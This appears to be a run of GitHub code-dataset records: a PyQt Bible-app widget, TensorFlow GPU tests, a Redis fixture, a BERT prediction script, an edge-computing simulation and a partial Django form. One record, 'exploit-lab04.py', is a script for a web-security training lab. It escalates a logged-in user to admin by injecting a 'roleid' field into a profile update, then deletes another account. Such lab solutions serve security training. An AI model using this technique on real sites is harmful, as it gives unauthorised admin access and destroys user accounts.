spaceBar.triggered.connect(self.spaceBarPressed)\n self.addAction(spaceBar)\n \n escKey = QAction(self)\n escKey.setShortcut(QKeySequence(Qt.Key_Escape))\n escKey.triggered.connect(self.escKeyPressed)\n self.addAction(escKey)\n\n qKey = QAction(self)\n qKey.setShortcut(QKeySequence(Qt.Key_Q))\n qKey.triggered.connect(self.qKeyPressed)\n self.addAction(qKey)\n \n subMenu = QMenu()\n\n action = QAction(self)\n action.setText(config.thisTranslation[\"bar2_menu\"])\n action.triggered.connect(self.openInStudyWindow)\n subMenu.addAction(action)\n \n escKey = QAction(self)\n escKey.setText(config.thisTranslation[\"menu1_fullScreen\"])\n escKey.setShortcut(QKeySequence(Qt.Key_Escape))\n escKey.triggered.connect(self.escKeyPressed)\n subMenu.addAction(escKey)\n\n action = QAction(self)\n action.setText(config.thisTranslation[\"displayContent\"])\n action.setMenu(subMenu)\n self.addAction(action)\n\n separator = QAction(self)\n separator.setSeparator(True)\n self.addAction(separator)\n\n action = QAction(self)\n action.setText(\"{0} | {1}\".format(config.thisTranslation[\"context1_search\"], sc.searchPopover))\n action.setShortcut(QKeySequence(sc.searchPopover))\n action.triggered.connect(self.searchPanel)\n self.addAction(action)\n \n runAsCommandLine = QAction(self)\n runAsCommandLine.setText(\"{0} | {1}\".format(config.thisTranslation[\"context1_command\"], sc.runCommandPopover))\n runAsCommandLine.setShortcut(QKeySequence(sc.runCommandPopover))\n runAsCommandLine.triggered.connect(self.runAsCommand)\n self.addAction(runAsCommandLine)\n\n separator = QAction(self)\n separator.setSeparator(True)\n self.addAction(separator)\n\n if self.enableCloseAction and not (hasattr(self.parent, \"name\") and self.parent.name == \"workspace\"):\n qKey = QAction(self)\n qKey.setText(\"{0} | {1}\".format(config.thisTranslation[\"close\"], sc.closePopoverWindow))\n qKey.setShortcut(QKeySequence(sc.closePopoverWindow))\n qKey.triggered.connect(self.qKeyPressed)\n self.addAction(qKey)\n\n def openInEditor(self):\n self.page().toPlainText(self.openInEditorAction)\n\n def openInEditorAction(self, plainText):\n windowTitle = self.windowTitle()\n html = config.mainWindow.htmlWrapper(plainText, parsing=True, html=False)\n self.parent.addHtmlContent(html, True, windowTitle)\n\n def messageNoSelection(self):\n config.mainWindow.studyView.currentWidget().displayMessage(\"{0}\\n{1}\".format(config.thisTranslation[\"message_run\"], config.thisTranslation[\"selectTextFirst\"]))\n\n def copySelectedText(self):\n if not self.selectedText():\n self.messageNoSelection()\n else:\n self.page().triggerAction(QWebEnginePage.Copy)\n\n def displayVersesInNewWindow(self):\n selectedText = self.selectedText().strip()\n config.mainWindow.studyView.currentWidget().displayVersesInNewWindow(selectedText)\n \n def displayVersesInBibleWindow(self):\n selectedText = self.selectedText().strip()\n config.mainWindow.studyView.currentWidget().displayVersesInBibleWindow(selectedText)\n\n def displayVersesInBottomWindow(self):\n selectedText = self.selectedText().strip()\n config.mainWindow.studyView.currentWidget().displayVersesInBottomWindow(selectedText)\n\n def displayVersesInPresentation(self):\n selectedText = self.selectedText().strip()\n config.mainWindow.studyView.currentWidget().runPlugin(\"Presentation_Ctrl+Shift+Y\", selectedText)\n\n def searchPanel(self):\n selectedText = self.selectedText().strip()\n config.mainWindow.studyView.currentWidget().searchPanel(selectedText)\n\n def openInStudyWindow(self):\n if self.name.lower().endswith(\"pdf\"):\n openPdfViewerInNewWindow = config.openPdfViewerInNewWindow\n config.openPdfViewerInNewWindow = False\n config.mainWindow.openPdfReader(self.name, fullPath=True)\n config.openPdfViewerInNewWindow = openPdfViewerInNewWindow\n elif self.name == \"EPUB\":\n config.mainWindow.runPlugin(\"ePub Viewer\")\n else:\n if self.htmlStored:\n self.openHtmlInStudyWindow(self.html)\n else:\n self.page().toHtml(self.openHtmlInStudyWindow)\n self.close()\n \n def openHtmlInStudyWindow(self, html):\n config.mainWindow.openTextOnStudyView(html, tab_title=\"study\")\n\n def runAsCommand(self):\n selectedText = self.selectedText()\n config.mainWindow.textCommandChanged(selectedText, \"main\")\n\n def closeEvent(self, event):\n if hasattr(config, \"macroIsRunning\") and config.macroIsRunning:\n config.pauseMode = False\n\n def spaceBarPressed(self):\n if hasattr(config, \"macroIsRunning\") and config.macroIsRunning:\n config.pauseMode = False\n\n def qKeyPressed(self):\n if hasattr(config, \"macroIsRunning\") and config.macroIsRunning:\n config.quitMacro = True\n config.pauseMode = False\n self.close()\n\n def escKeyPressed(self):\n if self.isMaximized():\n self.showFullScreen()\n else:\n self.showMaximized()\n\n def saveHtml(self, fileName=\"\"):\n if self.html is None:\n if not fileName:\n if self.htmlStored:\n self.saveHtmlToFile(self.html)\n else:\n self.page().toHtml(self.saveHtmlToFile)\n else:\n if self.htmlStored:\n self.saveHtmlToFileAction(self.html, fileName)\n else:\n self.page().toHtml(lambda html, fileName=fileName: self.saveHtmlToFileAction(html, fileName))\n else:\n if not fileName:\n self.saveHtmlToFile(self.html)\n else:\n self.saveHtmlToFileAction(self.html, fileName)\n\n def saveHtmlToFile(self, html):\n options = QFileDialog.Options()\n fileName, *_ = QFileDialog.getSaveFileName(self,\n config.thisTranslation[\"note_saveAs\"],\n \"\",\n \"HTML Files (*.html)\", \"\", options)\n if fileName:\n if not os.path.basename(fileName).lower().endswith(\".html\"):\n fileName = fileName + \".html\"\n self.saveHtmlToFileAction(html, fileName, True)\n\n def saveHtmlToFileAction(self, html, fileName, showSavedMessage=False):\n with open(fileName, \"w\", encoding=\"utf-8\") as fileObj:\n fileObj.write(html)\n if showSavedMessage:\n config.mainWindow.displayMessage(config.thisTranslation[\"saved\"])\n\n def changeWindowTitle(self, windowTitle=\"\"):\n if self.parent is config.mainWindow.ws:\n if not windowTitle:\n windowTitle, ok = QInputDialog.getText(self, config.thisTranslation[\"changeWindowTitle\"],\n config.thisTranslation[\"enter_text_here\"], QLineEdit.Normal,\n \"\")\n if ok and windowTitle:\n self.setWindowTitle(windowTitle)\n self.parent.saveWorkspace()\n else:\n self.setWindowTitle(windowTitle)\n self.parent.saveWorkspace()\n\n def addTextSelectionToWorkspace(self, selectedText=None, editable=False):\n if not selectedText:\n selectedText = self.selectedTextProcessed()\n if selectedText:\n config.mainWindow.addTextSelectionToWorkspace(selectedText, editable)\n else:\n self.messageNoSelection()\n\n def addBibleReferencesInTextSelectionToWorkspace(self, selectedText=None, editable=False):\n if not selectedText:\n selectedText = self.selectedTextProcessed()\n if selectedText:\n config.mainWindow.addBibleReferencesInTextSelectionToWorkspace(selectedText, editable)\n else:\n self.messageNoSelection()\n\n def selectedTextProcessed(self, activeSelection=False):\n if not activeSelection:\n selectedText = self.selectedText().strip()\n else:\n selectedText = config.mainWindow.mainView.currentWidget().selectedText().strip()\n if not selectedText:\n selectedText = config.mainWindow.studyView.currentWidget().selectedText().strip()\n if not selectedText and config.commandTextIfNoSelection:\n selectedText = config.mainWindow.textCommandLineEdit.text().strip()\n if not selectedText:\n text, ok = QInputDialog.getText(config.mainWindow, \"Unique Bible App\",\n config.thisTranslation[\"enter_text_here\"], QLineEdit.Normal,\n \"\")\n if ok and text:\n selectedText = text\n return selectedText\n\n def searchText(self, searchString):\n self.findText(searchString, QWebEnginePage.FindFlags())\n","repo_name":"eliranwong/UniqueBible","sub_path":"gui/WebEngineViewPopover.py","file_name":"WebEngineViewPopover.py","file_ext":"py","file_size_in_byte":18648,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"53"} +{"seq_id":"3222519169","text":"# Import necessary modules\r\nimport tensorflow as tf\r\nfrom tensorflow.keras.applications import ResNet50\r\n\r\n\r\ndef test_cuda_visibility():\r\n print('CUDA visibility')\r\n print('CUDA available', len(tf.config.list_physical_devices('GPU')) > 0)\r\n gpu_devices = tf.config.experimental.get_visible_devices('GPU')\r\n print('CUDA device count', len(gpu_devices))\r\n for gpu_device in gpu_devices:\r\n # Print the properties of each GPU\r\n print(f'*** CUDA {gpu_device.name} ***')\r\n print('Device details:', tf.config.experimental.get_device_details(gpu_device))\r\n\r\n\r\ndef test_inference(device_num: int = 0):\r\n # Configure the GPU options to use only device 1\r\n gpus = tf.config.experimental.get_visible_devices('GPU')\r\n if gpus:\r\n try:\r\n for gpu in gpus:\r\n tf.config.experimental.set_memory_growth(gpu, True)\r\n except RuntimeError as e:\r\n print(e)\r\n with tf.device(f'/GPU:{device_num}'):\r\n # Load the pre-trained ResNet50 model\r\n model = ResNet50(weights='imagenet')\r\n # Generate a random tensor as input\r\n input_tensor = tf.random.uniform((4, 224, 224, 3))\r\n print(input_tensor.device)\r\n # Use the model to conduct prediction on the input tensor\r\n predictions = model.predict(input_tensor).argmax(axis=1)\r\n # Print the predictions\r\n print(predictions)\r\n\r\n\r\ndef test_train():\r\n tf.debugging.set_log_device_placement(True)\r\n\r\n x = tf.random.uniform((5 * 32, 224, 224, 3))\r\n y = tf.random.uniform((5 * 32, 1000), maxval=1, dtype=tf.dtypes.int64)\r\n\r\n model = ResNet50(weights=None)\r\n model.compile(optimizer='adam', loss='categorical_crossentropy')\r\n\r\n with tf.device('/GPU:0'):\r\n # Fit the model on the input data and labels\r\n model.fit(x, y, epochs=1)\r\n\r\n\r\ndef test_train_dp():\r\n # Load the ResNet50 model\r\n model = ResNet50(weights=None)\r\n\r\n x = tf.random.uniform((10 * 32, 224, 224, 3))\r\n y = tf.random.uniform((10 * 32, 1000), maxval=1, dtype=tf.dtypes.int64)\r\n\r\n # Compile the model\r\n model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\r\n\r\n # Define a dataset and iterator\r\n dataset = tf.data.Dataset.from_tensor_slices((x, y))\r\n dataset = dataset.batch(32).repeat()\r\n iterator = iter(dataset)\r\n\r\n # Define a strategy for data parallelism\r\n strategy = tf.distribute.MirroredStrategy()\r\n\r\n # Define a function for the data parallelism\r\n def data_parallelism(inputs, labels):\r\n # Calculate the predictions on each GPU\r\n predictions = []\r\n for i in range(strategy.num_replicas_in_sync):\r\n with strategy.scope():\r\n output = model(inputs[i], training=True)\r\n predictions.append(output)\r\n\r\n # Concatenate the predictions and calculate the loss\r\n predictions = tf.concat(predictions, axis=0)\r\n loss = tf.reduce_mean(tf.keras.losses.categorical_crossentropy(labels, predictions))\r\n\r\n # Calculate the gradients and apply them to the model\r\n gradients = tf.gradients(loss, model.trainable_variables)\r\n optimizer = tf.optimizers.Adam(learning_rate=0.001)\r\n update_ops = optimizer.apply_gradients(zip(gradients, model.trainable_variables))\r\n\r\n # Return the loss and update operations\r\n return loss, update_ops\r\n\r\n # Define a training loop\r\n for epoch in range(1):\r\n # Split the inputs and labels for each GPU\r\n inputs, labels = next(iterator)\r\n inputs = tf.split(inputs, strategy.num_replicas_in_sync)\r\n labels = tf.split(labels, strategy.num_replicas_in_sync)\r\n\r\n # Run the data parallelism function\r\n loss, update_ops = data_parallelism(inputs, labels)\r\n with tf.control_dependencies(update_ops):\r\n train_op = tf.no_op()\r\n with strategy.scope():\r\n train_op.run()\r\n\r\n\r\nif __name__ == '__main__':\r\n test_cuda_visibility()\r\n # test_inference()\r\n # test_multi_gpu_inference()\r\n # test_train()\r\n test_train_dp()\r\n","repo_name":"MLSysOps/MIGProfiler","sub_path":"exp/compatibility/train/test_tf.py","file_name":"test_tf.py","file_ext":"py","file_size_in_byte":4057,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"53"} +{"seq_id":"13635858863","text":"import pytest\nfrom redis import Redis\n\nfrom redis_streams_test.test_utils import STREAM, set_logger, TEST_DATASET\n\n\nclass TestBase:\n redis_conn = Redis(decode_responses=True)\n logger = set_logger()\n\n @pytest.fixture(autouse=True)\n def prepare_redis(self):\n if self.redis_conn.xlen(name=STREAM):\n self.logger.info(f'Trim {STREAM}')\n self.redis_conn.xtrim(STREAM, maxlen=0)\n for test_data in TEST_DATASET:\n self.logger.debug(f\"Add test data: {test_data}\")\n self.redis_conn.xadd(name=STREAM, fields=test_data)\n assert self.redis_conn.xlen(name=STREAM) == len(TEST_DATASET)\n yield\n self.redis_conn.xtrim(STREAM, maxlen=0)\n for group in self.redis_conn.xinfo_groups(name=STREAM):\n self.redis_conn.xgroup_destroy(name=STREAM, groupname=group.get(\"name\"))\n self.redis_conn.delete(STREAM)\n","repo_name":"KissPeter/redis-streams","sub_path":"redis_streams_test/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"26028895995","text":"import numpy as np\nimport pandas as pd\nimport keras\nimport codecs\nimport re\nfrom keras_bert import Tokenizer, get_custom_objects\n\n\n# # focal loss with multi label\n# def focal_loss(classes_num, gamma=2., alpha=.25, e=0.1):\n# # classes_num contains sample number of each classes\n# def focal_loss_fixed(target_tensor, prediction_tensor):\n# '''\n# prediction_tensor is the output tensor with shape [None, 100], where 100 is the number of classes\n# target_tensor is the label tensor, same shape as predcition_tensor\n# '''\n# import tensorflow as tf\n# from tensorflow.python.ops import array_ops\n# from keras import backend as K\n\n# #1# get focal loss with no balanced weight which presented in paper function (4)\n# zeros = array_ops.zeros_like(prediction_tensor, dtype=prediction_tensor.dtype)\n# one_minus_p = array_ops.where(tf.greater(target_tensor,zeros), target_tensor - prediction_tensor, zeros)\n# FT = -1 * (one_minus_p ** gamma) * tf.log(tf.clip_by_value(prediction_tensor, 1e-8, 1.0))\n\n# #2# get balanced weight alpha\n# classes_weight = array_ops.zeros_like(prediction_tensor, dtype=prediction_tensor.dtype)\n\n# total_num = float(sum(classes_num))\n# classes_w_t1 = [ total_num / ff for ff in classes_num ]\n# sum_ = sum(classes_w_t1)\n# classes_w_t2 = [ ff/sum_ for ff in classes_w_t1 ] #scale\n# classes_w_tensor = tf.convert_to_tensor(classes_w_t2, dtype=prediction_tensor.dtype)\n# classes_weight += classes_w_tensor\n\n# alpha = array_ops.where(tf.greater(target_tensor, zeros), classes_weight, zeros)\n\n# #3# get balanced focal loss\n# balanced_fl = alpha * FT\n# balanced_fl = tf.reduce_mean(balanced_fl)\n\n# #4# add other op to prevent overfit\n# # reference : https://spaces.ac.cn/archives/4493\n# nb_classes = len(classes_num)\n# fianal_loss = (1-e) * balanced_fl + e * K.categorical_crossentropy(K.ones_like(prediction_tensor)/nb_classes, prediction_tensor)\n\n# return fianal_loss\n# return focal_loss_fixed\n\nmodel_name = 'roberta-wwm-large-ext'\nmodel_type = 'normal'\ntest_df = pd.read_csv('../data/Test_DataSet.csv')\ntest_df = test_df.fillna('EMPTY')\ntest_df['titlecontent'] = test_df['title'] + test_df['content']\n\n# text_list = []\n# for i in range(test_df.shape[0]):\n# text = test_df['titlecontent'][i]\n# text = re.sub(r'\\\\n+', '。', text)\n# text = text.replace('。。', '。')\n# text = text.replace('?。', '。')\n# text = text.replace('!。', '。')\n# text = text.replace(' 。', '。')\n# text_list.append(text)\n# test_df['titlecontent'] = text_list\n\nvocab_path = '../bert_model/%s/vocab.txt'%(model_name)\ntoken_dict = {}\nwith codecs.open(vocab_path, 'r', 'utf8') as reader:\n for line in reader:\n token = line.strip()\n token_dict[token] = len(token_dict)\n\nSEQ_LEN = 512\ncustom_objects = get_custom_objects()\n# custom_objects['focal_loss_fixed'] = focal_loss([763, 3640, 2925])\nmodel = keras.models.load_model('./model/%s-%s.h5'%(model_name, model_type), custom_objects=custom_objects)\n\ntokenizer = Tokenizer(token_dict)\n\nclass OurTokenizer(Tokenizer):\n def _tokenize(self, text):\n R = []\n for c in text:\n if c in self._token_dict:\n R.append(c)\n elif self._is_space(c):\n R.append('[unused1]') # space类用未经训练的[unused1]表示\n else:\n R.append('[UNK]') # 剩余的字符是[UNK]\n return R\n\ntokenizer = OurTokenizer(token_dict)\n\ntest_text = [text for text in test_df['titlecontent'].values]\nindices = []\nfor text in test_text:\n ids, segments = tokenizer.encode(text, max_len=SEQ_LEN)\n indices.append(ids)\nindices = np.array(indices)\nX_test = [indices, np.zeros_like(indices)]\n\ny_pred = model.predict(X_test)\nnew_label = np.argmax(y_pred, axis=1)\n\nnew_id = test_df['id'].values\n\nsubmission_df = pd.DataFrame()\nsubmission_df['id'] = new_id\n# submission_df['label'] = new_label\nsubmission_df['prob1'] = y_pred[:, 0]\nsubmission_df['prob2'] = y_pred[:, 1]\nsubmission_df['prob3'] = y_pred[:, 2]\nsubmission_df.to_csv('%s-%s_prob.csv'%(model_name, model_type), index=None)\n\n","repo_name":"linytsysu/news-emotion-analysis","sub_path":"fine-tune/submission.py","file_name":"submission.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8810684751","text":"# User role can be modified in user profile\n\nimport sys\nimport requests\nimport urllib3\nimport urllib.parse\nimport re\nimport time\nimport warnings\n\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nproxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\n\n##########################################################\n#\tFUNCTIONS\n##########################################################\n\ndef delete_carlos(s, url):\n\tlogin_path = url + '/login'\n\ttime.sleep(1)\n\tdata_login = {'username': 'wiener', 'password': 'peter'}\n\tprint('\\n[+] Trying to connect to the application as Wiener...')\n\tr = s.post(login_path, data=data_login)\n\ttime.sleep(1)\n\tif 'Your username is: wiener' in r.text:\n\t\tprint('[+] Logged in as Wiener !')\n\t\tchange_email_path = url + '/my-account/change-email'\n\t\tdata_role = {'email': 'gwyo@attacker.com', 'roleid': 2}\n\t\tprint('[+] Trying to change the role ID to find Admin panel...')\n\t\tr = s.post(change_email_path, json=data_role)\n\t\ttime.sleep(1)\n\t\tif 'Admin panel' in r.text:\n\t\t\tprint(\"[+] Admin panel found !\")\n\t\t\tdelete_user_path = url + \"/admin/delete?username=carlos\"\n\t\t\tprint('[+] Trying to delete Carlos user...')\n\t\t\tr = s.get(delete_user_path)\n\t\t\ttime.sleep(1)\n\t\t\tres = r.text\n\t\t\tif 'User deleted successfully!' in res:\n\t\t\t\tprint('[+] Carlos user successfully deleted !')\n\t\t\telse:\n\t\t\t\tprint('[-] Exploit failed to delete Carlos user ')\n\t\telse:\n\t\t\tprint('[-] Exploit failed to get Admin role ')\n\telse:\n\t\tprint('[-] Exploit failed to connect as Wiener ')\n\ndef show_usage():\n\tprint('[+] Usage: %s ' % sys.argv[0])\n\tprint('[+] Example: %s https://www.target.com' % sys.argv[0])\n\tsys.exit(-1)\n\n##########################################################\n#\tMAIN\n##########################################################\n\ndef main():\n\tprint('[+] Lab: User role can be modified in user profile')\n\ttry:\n\t\turl = sys.argv[1].strip()\n\texcept IndexError:\n\t\tshow_usage()\n\ts = requests.Session()\n\ts.proxies = proxies\t\t# Comment this line to disable proxying\n\ts.verify = False\n\ttry:\n\t\tr = s.get(url, allow_redirects=False)\n\t\ttime.sleep(1)\n\t\tif '

Error

' in r.text or 'Server Error: Gateway Timeout' in r.text:\n\t\t\tprint('\\n[-] HOST seems to be down ')\n\t\t\tsys.exit(-1)\n\t\telse:\n\t\t\tprint('[+] Trying to find Unprotected feature to delete Carlos user...\\n')\n\t\t\ttime.sleep(1)\n\t\t\tparsed_url = urllib.parse.urlparse(url)\n\t\t\thost = parsed_url.netloc\n\t\t\tif parsed_url.port:\n\t\t\t\tport = parsed_url.port\n\t\t\telif parsed_url.scheme == \"https\":\n\t\t\t\tport = 443\n\t\t\telif parsed_url.scheme == \"http\":\n\t\t\t\tport = 80\n\t\t\tprint(parsed_url)\n\t\t\turl = parsed_url.scheme + '://' + host\n\t\t\ttime.sleep(2)\n\t\t\tr = delete_carlos(s, url)\n\t\t\ts.cookies.clear()\n\t\t\ttime.sleep(2)\n\t\t\tr = s.get(url)\n\t\t\tif 'Congratulations, you solved the lab!' in r.text:\n\t\t\t\tprint('\\n[+] The lab is solved !')\n\texcept requests.exceptions.ProxyError:\n\t\tprint('[-] PROXY seems to be missconfigured ')\n\texcept KeyboardInterrupt:\n\t\tsys.exit(0)\n\nif __name__ == \"__main__\":\n\tmain()\n\n","repo_name":"gwyomarch/WebSecurityAcademy","sub_path":"AccessControl/exploit-lab04.py","file_name":"exploit-lab04.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74172609129","text":"import multiprocessing\nimport random\nfrom typing import Dict\n\nimport simpy\nfrom matplotlib import pyplot as plt\n\nfrom result_container import ResultContainer\nfrom src import default_architecture_parameters\nfrom src.clients.data_producer_client import DataProducerClient\nfrom src.processing_units.processing_location_central import ProcessingLocationCentral\nfrom src.processing_units.processing_location_city import ProcessingLocationCity\nfrom src.processing_units.processing_location_continent import ProcessingLocationContinent\nfrom src.processing_units.processing_location_country import ProcessingLocationCountry\nfrom src.processing_units.processing_location_district import ProcessingLocationDistrict\nfrom src.processing_units.processing_location_territory import ProcessingLocationTerritory\nfrom src.processing_units.on_processing_ended_enum import OnProcessingEndedEnum\n\nTOTAL_NUMBER_OF_PRODUCER_CLIENTS = 2000\nTOTAL_PACKAGES_PRODUCED_BY_EACH_CLIENT = 3 # Note: each client has a waiting time before producing a new package.\n\nCONFIGURATIONS = [\n {\n \"name\": \"With the Edge\",\n \"type\": \"edge\",\n },\n {\n \"name\": \"Cloud\",\n \"type\": \"cloud\",\n },\n]\n\n\ndef run_configuration(config: Dict) -> ResultContainer:\n print(f\"################## Running configuration: {config['name']}\")\n\n # Setup the simulation.\n result_container = ResultContainer(simulation_name=config['name'], simulation_type=config['type'])\n env = simpy.Environment()\n\n # Setup processes in the simulation.\n if config[\"type\"] == \"edge\":\n edge_central = ProcessingLocationCentral(\n simpy_env=env,\n result_container=result_container,\n name=f'Central',\n is_data_coming_from_first_link=False,\n mean_distance_km=default_architecture_parameters.MEAN_DISTANCE_DISTRICT_CENTRAL,\n std_distance_km=default_architecture_parameters.STD_DISTANCE_DISTRICT_CENTRAL,\n on_processing_ended_specification=OnProcessingEndedEnum.SAVE_TOTAL_LATENCY, # Save only here.\n )\n edge_central.start_listening_for_incoming_data()\n\n edge_continents = []\n for i in range(default_architecture_parameters.NUMBER_OF_CONTINENTS):\n edge_continent = ProcessingLocationContinent(\n simpy_env=env,\n result_container=result_container,\n name=f'Continent{i}',\n is_data_coming_from_first_link=False,\n mean_distance_km=default_architecture_parameters.MEAN_DISTANCE_DISTRICT_CONTINENT,\n std_distance_km=default_architecture_parameters.STD_DISTANCE_DISTRICT_CONTINENT,\n on_processing_ended_specification=OnProcessingEndedEnum.DO_NOTHING, # Otherwise latency is considered for multiple packages since in parallel.\n )\n edge_continent.start_listening_for_incoming_data()\n edge_continents.append(edge_continent)\n\n edge_countries = []\n for i in range(default_architecture_parameters.NUMBER_OF_COUNTRIES):\n edge_country = ProcessingLocationCountry(\n simpy_env=env,\n result_container=result_container,\n name=f'Country{i}',\n is_data_coming_from_first_link=False,\n mean_distance_km=default_architecture_parameters.MEAN_DISTANCE_DISTRICT_COUNTRY,\n std_distance_km=default_architecture_parameters.STD_DISTANCE_DISTRICT_COUNTRY,\n on_processing_ended_specification=OnProcessingEndedEnum.DO_NOTHING, # Otherwise latency is considered for multiple packages since in parallel.\n )\n edge_country.start_listening_for_incoming_data()\n edge_countries.append(edge_country)\n\n edge_territories = []\n for i in range(default_architecture_parameters.NUMBER_OF_TERRITORIES):\n edge_territory = ProcessingLocationTerritory(\n simpy_env=env,\n result_container=result_container,\n name=f'Territory{i}',\n is_data_coming_from_first_link=False,\n mean_distance_km=default_architecture_parameters.MEAN_DISTANCE_DISTRICT_TERRITORY,\n std_distance_km=default_architecture_parameters.STD_DISTANCE_DISTRICT_TERRITORY,\n on_processing_ended_specification=OnProcessingEndedEnum.DO_NOTHING, # Otherwise latency is considered for multiple packages since in parallel.\n )\n edge_territory.start_listening_for_incoming_data()\n edge_territories.append(edge_territory)\n\n edge_cities = []\n for i in range(default_architecture_parameters.NUMBER_OF_CITIES):\n edge_city = ProcessingLocationCity(\n simpy_env=env,\n result_container=result_container,\n name=f'City{i}',\n is_data_coming_from_first_link=False,\n mean_distance_km=default_architecture_parameters.MEAN_DISTANCE_DISTRICT_CITY,\n std_distance_km=default_architecture_parameters.STD_DISTANCE_DISTRICT_CITY,\n on_processing_ended_specification=OnProcessingEndedEnum.DO_NOTHING, # Otherwise latency is considered for multiple packages since in parallel.\n )\n edge_city.start_listening_for_incoming_data()\n edge_cities.append(edge_city)\n\n edge_receivers = []\n for i in range(default_architecture_parameters.NUMBER_OF_DISTRICTS):\n connected_edge_aggregators = [\n edge_central,\n random.choice(edge_continents),\n random.choice(edge_countries),\n random.choice(edge_territories),\n random.choice(edge_cities)\n ]\n transmissions = [connected_edge_aggregator.get_incoming_transmission() for connected_edge_aggregator in connected_edge_aggregators]\n assert len(transmissions) == 5\n edge_receiver = ProcessingLocationDistrict(\n simpy_env=env,\n result_container=result_container,\n name=f'District{i}',\n mean_distance_km=default_architecture_parameters.MEAN_DISTANCE_CLIENT_DISTRICT,\n std_distance_km=default_architecture_parameters.STD_DISTANCE_CLIENT_DISTRICT,\n on_processing_ended_specification=OnProcessingEndedEnum.SEND_TO_AGGREGATOR,\n transmissions_to_aggregators=transmissions,\n )\n edge_receiver.start_listening_for_incoming_data()\n edge_receivers.append(edge_receiver)\n\n for i in range(TOTAL_NUMBER_OF_PRODUCER_CLIENTS):\n connected_edge_receiver = random.choice(edge_receivers)\n transmission = connected_edge_receiver.get_incoming_transmission()\n data_producer = DataProducerClient(\n simpy_env=env,\n result_container=result_container,\n name=f'DataProducerClient{i}',\n transmission_to_data_collector=transmission,\n number_of_packages_to_produce=TOTAL_PACKAGES_PRODUCED_BY_EACH_CLIENT\n )\n data_producer.start_producing_data()\n elif config[\"type\"] == \"cloud\": # If cloud, setup the cloud and data_producers\n cloud = ProcessingLocationCentral(\n simpy_env=env,\n result_container=result_container,\n name=\"Cloud\",\n is_data_coming_from_first_link=True,\n mean_distance_km=default_architecture_parameters.MEAN_DISTANCE_CLIENT_CENTRAL,\n std_distance_km=default_architecture_parameters.STD_DISTANCE_CLIENT_CENTRAL,\n on_processing_ended_specification=OnProcessingEndedEnum.SAVE_TOTAL_LATENCY,\n )\n cloud.start_listening_for_incoming_data()\n\n for i in range(TOTAL_NUMBER_OF_PRODUCER_CLIENTS):\n transmission = cloud.get_incoming_transmission()\n data_producer = DataProducerClient(\n simpy_env=env,\n result_container=result_container,\n name=f'DataProducerClient{i}',\n transmission_to_data_collector=transmission,\n number_of_packages_to_produce=TOTAL_PACKAGES_PRODUCED_BY_EACH_CLIENT\n )\n data_producer.start_producing_data()\n else:\n raise Exception('Type not recognized')\n\n # Run simulation.\n env.run()\n\n result_container.print_result(should_total_be_equal_to_sum_of_parts=False) # Total latency not equal to sum of parts because data sent to multiple aggregators in parallel.\n return result_container\n\n\npool = multiprocessing.Pool()\nresults = pool.map(run_configuration, CONFIGURATIONS)\n\n# Prepare plot variables\ntotal_latencies = [result.get_average_total_latency() for result in results]\nfirst_traffic_per_distance = [result.get_total_first_link_traffic_per_distance() for result in results]\nsecond_traffic_per_distance = [result.get_total_second_link_traffic_per_distance() for result in results]\nnames = [result.simulation_name for result in results]\ncolors = ['green' if result.simulation_type == 'edge' else 'red' for result in results]\nx_positions = (range(len(results)))\n\n# Plot total latency.\nplt.figure(figsize=(5, 5))\nplt.title('Write Latencies')\nplt.bar(x_positions, total_latencies, color=colors)\nplt.axes().yaxis.grid() # horizontal lines\nplt.xticks(x_positions, names)\nplt.ylabel(\"Average Write Latency\")\nplt.tight_layout()\nplt.show()\n\n# Plot sum of traffic uncut.\nplt.figure(figsize=(5, 5))\nplt.title('Traffic * Distance')\nbars1 = first_traffic_per_distance\nbars2 = second_traffic_per_distance\nprint(results[0].traffic_per_distance_second_link_list[:100])\nprint(bars1)\nprint(bars2)\nplt.bar(x_positions, bars1, color='#333333')\nplt.bar(x_positions, bars2, bottom=bars1, color='#2d7f5e')\nplt.xticks(x_positions, names)\nplt.ylabel(\"Total (traffic in MB) * (distance in Km)\")\nplt.legend([\"First link\", \"Second Link\"])\nplt.tight_layout()\nplt.show()\n\n# Plot sum of traffic cut.\nplt.figure(figsize=(5, 5))\ncut_limit = int(1.5 * (first_traffic_per_distance[-2] + second_traffic_per_distance[-2]))\nplt.title(f'Total traffic * distance (cut at {cut_limit})')\nbars1 = first_traffic_per_distance\nbars2 = second_traffic_per_distance\nplt.bar(x_positions, bars1, color='#333333')\nplt.bar(x_positions, bars2, bottom=bars1, color='#2d7f5e')\nplt.axes().set_ylim([None, cut_limit])\nplt.xticks(x_positions, names)\nplt.ylabel(\"Total (traffic in MB) * (distance in Km)\")\nplt.legend([\"First link\", \"Second Link\"])\nplt.tight_layout()\nplt.show()\n","repo_name":"Desno365/location-aware-edge-api","sub_path":"evaluation/python-simulator/src/simulation_write_all_levels.py","file_name":"simulation_write_all_levels.py","file_ext":"py","file_size_in_byte":10499,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"33770898811","text":"from django import forms\nfrom .models import RecruitmentModel\nfrom Interviewer.models import InterviewSchedule\n\nclass RecruitmentForm(forms.ModelForm):\n OpportunityCode = forms.IntegerField()\n Qualification = forms.CharField()\n Registration_start_date = forms.DateField(widget=forms.SelectDateWidget)\n Age_limit = forms.IntegerField(min_value=21,max_value=45)\n Last_date_of_apply =forms.DateField(widget=forms.SelectDateWidget)\n Department_id = forms.CharField(label=\"Department ID\")\n No_Of_Positions = forms.IntegerField()\n Description = forms.CharField(widget=forms.Textarea)\n Responsibilities = forms.CharField()\n Contact_no = forms.IntegerField()\n\n class Meta:\n model=RecruitmentModel\n fields=\"__all__\"\n\n\nclass 